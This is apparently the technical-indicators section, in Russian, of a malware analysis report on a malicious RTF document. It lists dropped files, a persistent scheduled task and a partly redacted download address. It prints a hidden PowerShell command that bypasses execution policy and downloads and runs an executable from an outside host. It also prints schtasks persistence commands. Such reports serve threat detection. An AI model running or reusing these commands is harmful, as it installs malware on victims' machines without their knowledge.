Техническая информация
- <SYSTEM32>\tasks\updates\huljng
- http://13.##.179.221/assc/doc.exe как %appdata%\doc.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %APPDATA%\doc.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\huljng.exe
- %TEMP%\tmp1f43.tmp
- %APPDATA%\huljng.exe
- %TEMP%\abctfhghgdghgh‹.sct
- %TEMP%\tmp1f43.tmp
- <PATH_SAMPLE>.rtf
- '13.##.179.221':80
- '%APPDATA%\doc.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://13.##.179.221/assc/doc.exe','%APPDATA%\doc.exe');Start-Process '%APPDA...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\HULJNG" /XML "%TEMP%\tmp1F43.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\HULJNG" /XML "%TEMP%\tmp1F43.tmp"